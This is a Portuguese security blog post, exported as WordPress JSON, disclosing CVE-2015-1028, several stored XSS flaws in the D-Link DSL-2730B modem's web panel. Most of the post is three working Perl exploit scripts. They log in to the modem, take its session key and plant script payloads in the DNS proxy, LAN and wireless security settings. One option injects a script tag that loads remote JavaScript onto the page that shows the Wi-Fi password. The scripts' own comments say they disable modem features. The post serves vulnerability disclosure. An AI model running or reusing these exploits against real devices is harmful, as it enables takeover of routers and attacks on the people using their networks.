{"id":339,"date":"2015-01-11T03:21:38","date_gmt":"2015-01-11T03:21:38","guid":{"rendered":"http:\/\/www.xlabs.com.br\/blog\/?p=339"},"modified":"2021-08-25T17:43:54","modified_gmt":"2021-08-25T20:43:54","slug":"cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","title":{"rendered":"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored"},"content":{"rendered":"<p>Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.<\/p>\n<h4><\/h4>\n<h4><strong>Descri\u00e7\u00e3o da plataforma segundo o website do fabricante<\/strong><\/h4>\n<p>O DSL-2730B, Modem banda larga ADSL com Roteador Wireless integrado da D-Link \u00e9 ideal para usu\u00e1rios que obt\u00eam a sua conex\u00e3o \u00e0 Internet atrav\u00e9s da linha telef\u00f4nica. Este roteador conecta-se diretamente \u00e0 linha telef\u00f4nica, sem a necessidade de um modem ADSL. Por tamb\u00e9m ser um roteador Wireless, o DSL-2730B conecta um grupo de usu\u00e1rios \u00e0 Internet, permitindo que computadores em uma casa ou um escrit\u00f3rio compartilhem uma conex\u00e3o de alta velocidade ADSL 2\/2+. Ele fornece conex\u00e3o wireless para computadores e dispositivos sem fio. Possui quatro portas Ethernet, prote\u00e7\u00e3o de firewall e QoS para downloads ou uploads eficientes e seguros de fotos, arquivos de m\u00fasica, v\u00eddeos e e-mail atrav\u00e9s da Internet.<\/p>\n<p><a href=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg\"><img decoding=\"async\" class=\"alignnone wp-image-340\" src=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg\" alt=\"Index\" width=\"724\" height=\"611\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg 835w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index-300x253.jpg 300w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/a><\/p>\n<h4><\/h4>\n<h4><strong>A falha de seguran\u00e7a<\/strong><\/h4>\n<p># Software:\u00a0D-Link DSL-2730B<br \/>\n# Vers\u00e3o: GE 1.01<br \/>\n# Empresa:\u00a0D-Link<br \/>\n# Website: <a href=\"http:\/\/www.dlink.com\" target=\"_blank\" rel=\"noopener noreferrer\">www.dlink.com<\/a><br \/>\n# Vulnerabilidade: M\u00faltiplos Cross Site Scripting Armazenado\u00a0(XSS Injection Stored)<br \/>\n# CVE:\u00a0CVE-2015-1028<br \/>\n# Autor: Mauricio Corr\u00eaa<br \/>\n# POC: <a href=\"http:\/\/www.xlabs.com.br\/blog\/?p=362\" target=\"_blank\" rel=\"noopener noreferrer\">Video<\/a><\/p>\n<iframe  id=\"_ytid_66296\"  width=\"750\" height=\"422\"  data-origwidth=\"750\" data-origheight=\"422\" src=\"https:\/\/www.youtube.com\/embed\/ksAyKH_Sl-Q?enablejsapi=1&autoplay=0&cc_load_policy=0&cc_lang_pref=&iv_load_policy=1&loop=0&modestbranding=0&rel=1&fs=1&playsinline=0&autohide=2&theme=dark&color=red&controls=1&\" class=\"__youtube_prefs__  no-lazyload\" title=\"YouTube player\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen data-no-lazy=\"1\" data-skipgform_ajax_framebjll=\"\"><\/iframe>\n<p><strong>dnsProxy.cmd exploit (DNS Proxy Configuration Panel)<\/strong><\/p>\n<pre class=\"lang:perl decode:true\" title=\"Exploit dnsProxy.cmd Stored XSS Injection\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit enable some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing...\\n\";\n\t\t\t\n\t\t\tmy $url = \"$ip\/dnsProxy.cmd?enblDproxy=1&amp;hostname=Broadcom&amp;domainname=A\";\n\t\t\t\n\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\n\t\t\tmy $resposta = $resp-&gt;as_string;\n\n\t\t\tprint \"[+] Obtain session key...\\n\";\n\t\t\t\n\t\t\tmy $token = \"\";\n\t\t\t\n\t\t\tif($resposta =~ \/sessionKey=(.*)\\';\/){\n\t\t\t\t$token = $1;\t\t\t\n\t\t\t\tprint \"[+] Session key found: $token\\n\";\n\t\t\t}else{\n\t\t\t\tprint \"[-] Session key not found!\\n\";\n\t\t\t\texit;\n\t\t\t}\n\t\t\t\n\t\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\t\tmy $url_and_xpl = \"$ip\/dnsProxy.cmd?enblDproxy=1&amp;hostname=Broadcom&amp;domainname=XSS$payload&amp;sessionKey=$token\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\t\n\t\t\t\tprint \"[+] Exploiting...\\n\";\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n<p><strong>lancfg2get.cgi Exploit (Lan Configuration Panel)<\/strong><\/p>\n<pre class=\"lang:perl decode:true\" title=\"Exploit lancfg2get.cgi XSS Injection Stored\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = \"$ip\/lancfg2get.cgi?brName=$payload\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/lancfg2.html\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n<p><strong>wlsecrefresh.wl &amp; wlsecurity.wl Exploit (Wireless Security Panel and Wireless Password Viewer)<\/strong><\/p>\n<pre class=\"lang:perl decode:true \" title=\"wlsecrefresh.wl &amp; wlsecurity.wl Exploit XSS Injection Stored\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\t\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\n\tmy $opt = $ARGV[3];\n\t\n\t\n\n\t\tif (@ARGV != 4){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass option\\n\";\n\t\t\tprint \"\\n\";\n\t\t\tprint \"Options: 1 - Parameter: wlAuthMode \\n\";\n\t\t\tprint \"\t 2 - Parameter: wl_wsc_reg \\n \";\n\t\t\tprint \"\t 3 - Parameter: wl_wsc_mode \\n\";\n\t\t\tprint \"\t 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27\\\/\\\/XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing...\\n\";\n\t\t\t\n\t\t\tmy $url_and_payload = \"\";\n\t\t\t\n\t\t\tif($opt == 1){\n\t\t\t\t$url_and_payload = \"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled&amp;wl_wsc_reg=disabled&amp;wlAuth=0&amp;wlAuthMode=1$payload\".\n\t\t\t\t\t\t\t\t      \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\t\t\n\t\t\t}elsif($opt == 2){\n\t\t\t\t$url_and_payload = \"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled&amp;wl_wsc_reg=disabled$payload&amp;wlAuth=0&amp;wlAuthMode=997354\".\n\t\t\t\t\t\t\t\t\t  \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\n\t\t    }elsif($opt == 3){\n\t\t\t    $payload = \"%27;alert(%27\\\/\\\/XLabsSec%27);\\\/\\\/\";\n\t\t\t\t$url_and_payload = \"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&amp;wl_wsc_reg=disabled&amp;wlAuth=0&amp;wlAuthMode=997354\".\n\t\t\t\t\t\t\t\t\t  \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\n\t\t\t}elsif($opt == 4){\t\t\t\n\t\t\t\t$payload = \"GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E\";\n\t\t\t\t$url_and_payload = \"$ip\/wlsecurity.wl?wl_wsc_mode=enabled&amp;wl_wsc_reg=disabled&amp;wsc_config_state=0&amp;wlAuthMode=psk%20psk2&amp;wlAuth=0&amp;\".\n\t\t\t\t\t\t\t\t   \"wlWpaPsk=$payload&amp;wlWpaGtkRekey=0&amp;wlNetReauth=36000&amp;wlWep=disabled&amp;wlWpa=aes&amp;wlKeyBit=0&amp;wlPreauth=0&amp;\".\n\t\t\t\t\t\t\t\t   \"wlSsidIdx=0&amp;wlSyncNvram=1\";\t\t\t\n\t\t\t}else{\t\t\t\t\n\t\t\t\tprint \"[-] Chose one option!\\n\";\n\t\t\t\texit;\t\t\t\n\t\t\t}\n\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_payload,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\n\t\t\tmy $resposta = $resp-&gt;as_string;\n\n\t\t\tprint \"[+] Checking for properly explored...\\n\";\n\t\t\t\t\t\n\t\t\tmy $url = \"$ip\/wlsecurity.html\";\n\t\t\t\n\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\t\t\t\t\n\t\t\t\t\tmy $result = $resp2-&gt;as_string;\n\t\t\t\t\t\n\t\t\t\t\tif($opt == 4){\n\t\t\t\t\t\t$payload = \"%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27\";\n\t\t\t\t\t}\t\t\t\t\t\n\n\t\t\t\t\tif(index($result, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t}else{\n\t\t\t\t\t\n\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\n\t\t\t\t\t}\n\n\t\t\t\t}\n\t\t\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1589,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[42,88,89,90],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2015-01-11T03:21:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T20:43:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/d-link-modem-dsl-2730b-xss-injection-stored-blog-post-xlabs.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Mauricio Corr\u00eaa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/d-link-modem-dsl-2730b-xss-injection-stored-blog-post-xlabs.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauricio Corr\u00eaa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\"},\"author\":{\"name\":\"Mauricio Corr\u00eaa\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\"},\"headline\":\"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored\",\"datePublished\":\"2015-01-11T03:21:38+00:00\",\"dateModified\":\"2021-08-25T20:43:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\"},\"wordCount\":288,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"Cross Site Scripting\",\"D-Link\",\"DSL-2730B\",\"XSS Injection Stored\"],\"articleSection\":[\"Falhas de Seguran\u00e7a\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\",\"name\":\"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2015-01-11T03:21:38+00:00\",\"dateModified\":\"2021-08-25T20:43:54+00:00\",\"description\":\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\",\"name\":\"Mauricio Corr\u00eaa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"caption\":\"Mauricio Corr\u00eaa\"},\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog","description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas 